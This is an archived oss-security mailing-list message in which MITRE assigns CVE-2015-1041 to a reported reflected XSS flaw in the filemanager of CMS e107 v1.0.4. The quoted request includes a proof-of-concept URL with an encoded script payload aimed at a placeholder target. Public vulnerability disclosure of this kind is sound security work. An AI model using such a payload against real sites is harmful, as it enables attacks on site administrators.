Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 11 Jan 2015 09:47:55 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE Request -- CMS e107 v.1.0.4 -- Reflecting
 XSS vulnerability in filemanager functionality


> Hi Josh, Steve, vendors, list.
>
> I found a reflecting XSS vulnerability in the filemanager functionality in
> the administrative backend of CMS e107 v.1.0.4.
>
> It can be exploited by an attacker like in the following example:
>
> http://{TARGET}/e107_admin/filemanager.php?e107_files/%3C%73%63%72%69%70%74%3Ealert(String.fromCharCode(34,
> 88, 83, 83,
> 34))%3C%2F%73%63%72%69%70%74%3E%3C!--%3C%2F%73%63%72%69%70%74%3E%3C!--
>
> Could you please assign a CVE-ID for it?
>
> Thank you!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] http://e107.org/
> [2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-05.html
> [3] https://github.com/e107inc/e107v1/issues/2
> [4]
> http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-05.html
> [5] http://seclists.org/fulldisclosure/2015/Jan/18

Use CVE-2015-1041.

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ